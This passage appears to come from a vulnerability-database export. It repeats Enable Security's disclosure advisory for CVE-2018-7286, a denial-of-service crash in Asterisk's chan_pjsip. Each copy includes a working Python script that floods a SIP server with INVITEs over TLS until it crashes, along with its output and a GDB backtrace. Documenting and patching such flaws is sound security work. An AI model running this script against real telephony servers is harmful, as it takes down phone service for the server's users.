re.search(\r\n \"realm=\\\"([a-z]+)\\\"\", content).group(1)\r\n nonce = re.search(\r\n \"nonce=\\\"([a-z0-9\\/]+)\\\"\", content).group(1)\r\n ha1 = md5.new(USERNAME + \":\" + realm +\r\n \":\" + PASSWORD).hexdigest()\r\n uri = \"sip:%s:%i\" % (SERVER_IP, SERVER_PORT)\r\n ha2 = md5.new(\"INVITE:\" + uri).hexdigest()\r\n r = md5.new(ha1 + \":\" + nonce + \":\" + ha2).hexdigest()\r\n\r\n auth = \"Authorization: Digest username=\\\"%s\\\",\" % (USERNAME) + \\\r\n \"realm=\\\"%s\\\",\" % (realm) + \\\r\n \"nonce=\\\"%s\\\",\" % (nonce) + \\\r\n \"uri=\\\"%s\\\",\" % (uri) + \\\r\n \"response=\\\"%s\\\",\" % (r) + \\\r\n \"algorithm=md5\\r\\n\"\r\n print(auth)\r\n\r\n sock.sendall(msg.replace(\"{{AUTH}}\", auth))\r\n errno = 0\r\n except (socket.error, ssl.SSLEOFError), err:\r\n print(err)\r\n print(\"getting close!\")\r\n sleep(2)\r\n errno += 1\r\n if errno >= 10:\r\n print(\"confirmed dead\")\r\n break\r\n elif errno > lasterrno:\r\n lasterrno = errno\r\n continue\r\n\r\n'''\r\nThe output from the tool should show the following:\r\n\r\n```\r\n> python test.py\r\nAuthorization: Digest username=\"3000\",realm=\"asterisk\",nonce=\"1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae\",uri=\"sip:127.0.0.1:5061\",response=\"a2b7e2bfa722730b64787664db474f2a\",algorithm=md5\r\n\r\nEOF occurred in violation of protocol (_ssl.c:590)\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\nconfirmed dead\r\n```\r\n\r\nNotes:\r\n\r\n- authentication may be required\r\n- the destination SIP address should match a valid extension in the dialplan\r\n- similar code to the above can be used to reproduce the issue on TCP transport\r\n\r\n\r\n### GDB backtrace result\r\n\r\n```\r\ngdb --args /opt/asterisk/sbin/asterisk -fcvvv\r\n\r\nThread 25 \"asterisk\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7ffff030a700 (LWP 133)]\r\nast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\r\n3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {\r\n(gdb) bt\r\n#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\r\n#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371\r\n#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455\r\n#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317\r\n#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890\r\n#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717\r\n#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066\r\n#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)\r\n at ../src/pjsip/sip_transaction.c:1267\r\n#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970\r\n#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721\r\n#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)\r\n at res_pjsip/pjsip_resolver.c:527\r\n#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,\r\n cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209\r\n#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,\r\n cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164\r\n#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,\r\n cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796\r\n#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237\r\n#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704\r\n#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634\r\n#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789\r\n#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531\r\n#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231\r\n#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712\r\n#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963\r\n#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062\r\n#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126\r\n#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,\r\n p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893\r\n#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903\r\n#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963\r\n#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322\r\n#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963\r\n#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351\r\n#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105\r\n#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024\r\n#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257\r\n#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333\r\n#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\r\n(gdb)\r\n```\r\n\r\n## Solutions and recommendations\r\n\r\nApply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.\r\n\r\n## About Enable Security\r\n\r\n[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.\r\n\r\n## Disclaimer\r\n\r\nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44181/"}], "packetstorm": [{"lastseen": "2018-02-27T09:37:08", "description": "", "published": "2018-02-26T00:00:00", "type": "packetstorm", "title": "Asterisk 15.2.0 chan_pjsip INVITE Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7286"], "modified": "2018-02-26T00:00:00", "id": "PACKETSTORM:146580", "href": "https://packetstormsecurity.com/files/146580/Asterisk-15.2.0-chan_pjsip-INVITE-Denial-Of-Service.html", "sourceData": "`# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport \n \n- Authors: \n- Alfred Farrugia <alfred@enablesecurity.com> \n- Sandro Gauci <sandro@enablesecurity.com> \n- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled` \n- References: AST-2018-005, CVE-2018-7286 \n- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault> \n- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html> \n- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5 \n- Timeline: \n- Issue reported to vendor: 2018-01-24 \n- Vendor patch made available to us: 2018-02-05 \n- Vendor advisory published: 2018-02-21 \n- Enable Security advisory: 2018-02-22 \n \n## Description \n \nA crash occurs when a number of INVITE messages are sent over TCP or TLS and \nthen the connection is suddenly closed. This issue leads to a segmentation fault. \n \n## Impact \n \nAbuse of this vulnerability leads to denial of service in Asterisk when \n`chan_pjsip` is in use. \n \n## How to reproduce the issue \n \nThe following script was used to reproduce the issue on a TLS connection: \n \n```python \nimport md5 \nimport re \nimport socket \nimport ssl \nimport uuid \nfrom time import sleep \n \nSERVER_IP = \"127.0.0.1\" \nSERVER_PORT = 5061 \nUSERNAME = \"3000\" \nPASSWORD = \"3000\" \nINVITE_USERNAME = \"3000\" \n \nerrno = 0 \nlasterrno = 0 \nwhile True: \ntry: \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock = ssl.wrap_socket(sock, \nssl_version=ssl.PROTOCOL_TLSv1, \n) \n \nsock.connect((SERVER_IP, SERVER_PORT)) \nsock.settimeout(0.5) \nerrno = 0 \ncallid = str(uuid.uuid4()) \nfor ix in range(10): \nsdpbody = \"\" \n \nmsg = \"INVITE sip:%s@%s:%i SIP/2.0\\r\\n\" \\ \n\"To: <sip:%s@%s:%i>\\r\\n\" \\ \n\"From: Test <sip:%s@%s:%s>\\r\\n\" \\ \n\"Call-ID: %s\\r\\n\" \\ \n\"CSeq: 2 INVITE\\r\\n\" \\ \n\"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\\r\\n\" \\ \n\"Contact: <sip:%s@172.17.0.1>\\r\\n\" \\ \n\"Content-Type: application/sdp\\r\\n\" \\ \n\"{{AUTH}}\" \\ \n\"Content-Length: %i\\r\\n\" \\ \n\"\\r\\n\" % ( \nINVITE_USERNAME, SERVER_IP, SERVER_PORT, \nINVITE_USERNAME, SERVER_IP, SERVER_PORT, \nUSERNAME, SERVER_IP, SERVER_PORT, \ncallid, callid, \nUSERNAME, len(sdpbody) \n) + \\ \nsdpbody \n \nsock.sendall(msg.replace(\"{{AUTH}}\", \"\")) \n \ndata = sock.recv(10240) \n# print(data) \nif data.startswith(\"SIP/2.0 401\"): \nfor line in data.split('\\r\\n'): \nif line.startswith(\"WWW-Authenticate\"): \ncontent = line.split(':', 2)[1].strip() \nrealm = re.search( \n\"realm=\\\"([a-z]+)\\\"\", content).group(1) \nnonce = re.search( \n\"nonce=\\\"([a-z0-9\\/]+)\\\"\", content).group(1) \nha1 = md5.new(USERNAME + \":\" + realm + \n\":\" + PASSWORD).hexdigest() \nuri = \"sip:%s:%i\" % (SERVER_IP, SERVER_PORT) \nha2 = md5.new(\"INVITE:\" + uri).hexdigest() \nr = md5.new(ha1 + \":\" + nonce + \":\" + ha2).hexdigest() \n \nauth = \"Authorization: Digest username=\\\"%s\\\",\" % (USERNAME) + \\ \n\"realm=\\\"%s\\\",\" % (realm) + \\ \n\"nonce=\\\"%s\\\",\" % (nonce) + \\ \n\"uri=\\\"%s\\\",\" % (uri) + \\ \n\"response=\\\"%s\\\",\" % (r) + \\ \n\"algorithm=md5\\r\\n\" \nprint(auth) \n \nsock.sendall(msg.replace(\"{{AUTH}}\", auth)) \nerrno = 0 \nexcept (socket.error, ssl.SSLEOFError), err: \nprint(err) \nprint(\"getting close!\") \nsleep(2) \nerrno += 1 \nif errno >= 10: \nprint(\"confirmed dead\") \nbreak \nelif errno > lasterrno: \nlasterrno = errno \ncontinue \n``` \n \nThe output from the tool should show the following: \n \n``` \n> python test.py \nAuthorization: Digest username=\"3000\",realm=\"asterisk\",nonce=\"1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae\",uri=\"sip:127.0.0.1:5061\",response=\"a2b7e2bfa722730b64787664db474f2a\",algorithm=md5 \n \nEOF occurred in violation of protocol (_ssl.c:590) \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \n[Errno 111] Connection refused \ngetting close! \nconfirmed dead \n``` \n \nNotes: \n \n- authentication may be required \n- the destination SIP address should match a valid extension in the dialplan \n- similar code to the above can be used to reproduce the issue on TCP transport \n \n \n### GDB backtrace result \n \n``` \ngdb --args /opt/asterisk/sbin/asterisk -fcvvv \n \nThread 25 \"asterisk\" received signal SIGSEGV, Segmentation fault. \n[Switching to Thread 0x7ffff030a700 (LWP 133)] \nast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956 \n3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) { \n(gdb) bt \n#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956 \n#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371 \n#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455 \n#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317 \n#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890 \n#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717 \n#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066 \n#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0) \nat ../src/pjsip/sip_transaction.c:1267 \n#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970 \n#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721 \n#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>) \nat res_pjsip/pjsip_resolver.c:527 \n#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0, \ncb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209 \n#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0, \ncb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164 \n#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408, \ncb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796 \n#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237 \n#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704 \n#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634 \n#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789 \n#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531 \n#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231 \n#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712 \n#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963 \n#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062 \n#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126 \n#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>, \np_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893 \n#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903 \n#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963 \n#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322 \n#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963 \n#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351 \n#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105 \n#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024 \n#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257 \n#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333 \n#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109 \n(gdb) \n``` \n \n## Solutions and recommendations \n \nApply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release. \n \n## About Enable Security \n \n[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers. \n \n## Disclaimer \n \nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146580/ES2018-04.txt"}], "zdt": [{"lastseen": "2018-03-09T21:11:28", "description": "Asterisk running chan_pjsip suffers from an INVITE message denial of service vulnerability. Versions affected include Versions affected include 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, and 14.7.5.", "edition": 1, "published": "2018-02-27T00:00:00", "type": "zdt", "title": "Asterisk 15.2.0 chan_pjsip INVITE Denial Of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7286"], "modified": "2018-02-27T00:00:00", "href": "https://0day.today/exploit/description/29889", "id": "1337DAY-ID-29889", "sourceData": "# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport\r\n\r\n- Authors:\r\n - Alfred Farrugia <[email\u00a0protected]>\r\n - Sandro Gauci <[email\u00a0protected]>\r\n- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`\r\n- References: AST-2018-005, CVE-2018-7286\r\n- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>\r\n- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>\r\n- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5\r\n- Timeline:\r\n - Issue reported to vendor: 2018-01-24\r\n - Vendor patch made available to us: 2018-02-05\r\n - Vendor advisory published: 2018-02-21\r\n - Enable Security advisory: 2018-02-22\r\n\r\n## Description\r\n\r\nA crash occurs when a number of INVITE messages are sent over TCP or TLS and\r\nthen the connection is suddenly closed. This issue leads to a segmentation fault. \r\n\r\n## Impact\r\n\r\nAbuse of this vulnerability leads to denial of service in Asterisk when\r\n`chan_pjsip` is in use.\r\n\r\n## How to reproduce the issue\r\n\r\nThe following script was used to reproduce the issue on a TLS connection:\r\n\r\n```python\r\nimport md5\r\nimport re\r\nimport socket\r\nimport ssl\r\nimport uuid\r\nfrom time import sleep\r\n\r\nSERVER_IP = \"127.0.0.1\"\r\nSERVER_PORT = 5061\r\nUSERNAME = \"3000\"\r\nPASSWORD = \"3000\"\r\nINVITE_USERNAME = \"3000\"\r\n\r\nerrno = 0\r\nlasterrno = 0\r\nwhile True:\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock = ssl.wrap_socket(sock,\r\n ssl_version=ssl.PROTOCOL_TLSv1,\r\n )\r\n\r\n sock.connect((SERVER_IP, SERVER_PORT))\r\n sock.settimeout(0.5)\r\n errno = 0\r\n callid = str(uuid.uuid4())\r\n for ix in range(10):\r\n sdpbody = \"\"\r\n\r\n msg = \"INVITE sip:%[email\u00a0protected]%s:%i SIP/2.0\\r\\n\" \\\r\n \"To: <sip:%[email\u00a0protected]%s:%i>\\r\\n\" \\\r\n \"From: Test <sip:%[email\u00a0protected]%s:%s>\\r\\n\" \\\r\n \"Call-ID: %s\\r\\n\" \\\r\n \"CSeq: 2 INVITE\\r\\n\" \\\r\n \"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\\r\\n\" \\\r\n \"Contact: <sip:%[email\u00a0protected]>\\r\\n\" \\\r\n \"Content-Type: application/sdp\\r\\n\" \\\r\n \"{{AUTH}}\" \\\r\n \"Content-Length: %i\\r\\n\" \\\r\n \"\\r\\n\" % (\r\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\r\n INVITE_USERNAME, SERVER_IP, SERVER_PORT,\r\n USERNAME, SERVER_IP, SERVER_PORT,\r\n callid, callid,\r\n USERNAME, len(sdpbody)\r\n ) + \\\r\n sdpbody\r\n\r\n sock.sendall(msg.replace(\"{{AUTH}}\", \"\"))\r\n\r\n data = sock.recv(10240)\r\n # print(data)\r\n if data.startswith(\"SIP/2.0 401\"):\r\n for line in data.split('\\r\\n'):\r\n if line.startswith(\"WWW-Authenticate\"):\r\n content = line.split(':', 2)[1].strip()\r\n realm = re.search(\r\n \"realm=\\\"([a-z]+)\\\"\", content).group(1)\r\n nonce = re.search(\r\n \"nonce=\\\"([a-z0-9\\/]+)\\\"\", content).group(1)\r\n ha1 = md5.new(USERNAME + \":\" + realm +\r\n \":\" + PASSWORD).hexdigest()\r\n uri = \"sip:%s:%i\" % (SERVER_IP, SERVER_PORT)\r\n ha2 = md5.new(\"INVITE:\" + uri).hexdigest()\r\n r = md5.new(ha1 + \":\" + nonce + \":\" + ha2).hexdigest()\r\n\r\n auth = \"Authorization: Digest username=\\\"%s\\\",\" % (USERNAME) + \\\r\n \"realm=\\\"%s\\\",\" % (realm) + \\\r\n \"nonce=\\\"%s\\\",\" % (nonce) + \\\r\n \"uri=\\\"%s\\\",\" % (uri) + \\\r\n \"response=\\\"%s\\\",\" % (r) + \\\r\n \"algorithm=md5\\r\\n\"\r\n print(auth)\r\n\r\n sock.sendall(msg.replace(\"{{AUTH}}\", auth))\r\n errno = 0\r\n except (socket.error, ssl.SSLEOFError), err:\r\n print(err)\r\n print(\"getting close!\")\r\n sleep(2)\r\n errno += 1\r\n if errno >= 10:\r\n print(\"confirmed dead\")\r\n break\r\n elif errno > lasterrno:\r\n lasterrno = errno\r\n continue\r\n```\r\n\r\nThe output from the tool should show the following:\r\n\r\n```\r\n> python test.py\r\nAuthorization: Digest username=\"3000\",realm=\"asterisk\",nonce=\"1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae\",uri=\"sip:127.0.0.1:5061\",response=\"a2b7e2bfa722730b64787664db474f2a\",algorithm=md5\r\n\r\nEOF occurred in violation of protocol (_ssl.c:590)\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\n[Errno 111] Connection refused\r\ngetting close!\r\nconfirmed dead\r\n```\r\n\r\nNotes:\r\n\r\n- authentication may be required\r\n- the destination SIP address should match a valid extension in the dialplan\r\n- similar code to the above can be used to reproduce the issue on TCP transport\r\n\r\n\r\n### GDB backtrace result\r\n\r\n```\r\ngdb --args /opt/asterisk/sbin/asterisk -fcvvv\r\n\r\nThread 25 \"asterisk\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7ffff030a700 (LWP 133)]\r\nast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\r\n3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {\r\n(gdb) bt\r\n#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956\r\n#1 0x00007ffff1a8dbb1 in check_request_status ([email\u00a0protected]=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371\r\n#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455\r\n#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317\r\n#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890\r\n#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717\r\n#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066\r\n#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)\r\n at ../src/pjsip/sip_transaction.c:1267\r\n#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970\r\n#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721\r\n#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)\r\n at res_pjsip/pjsip_resolver.c:527\r\n#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, [email\u00a0protected]=0x7fff99116530, [email\u00a0protected]=0x7fff9918d2f0,\r\n 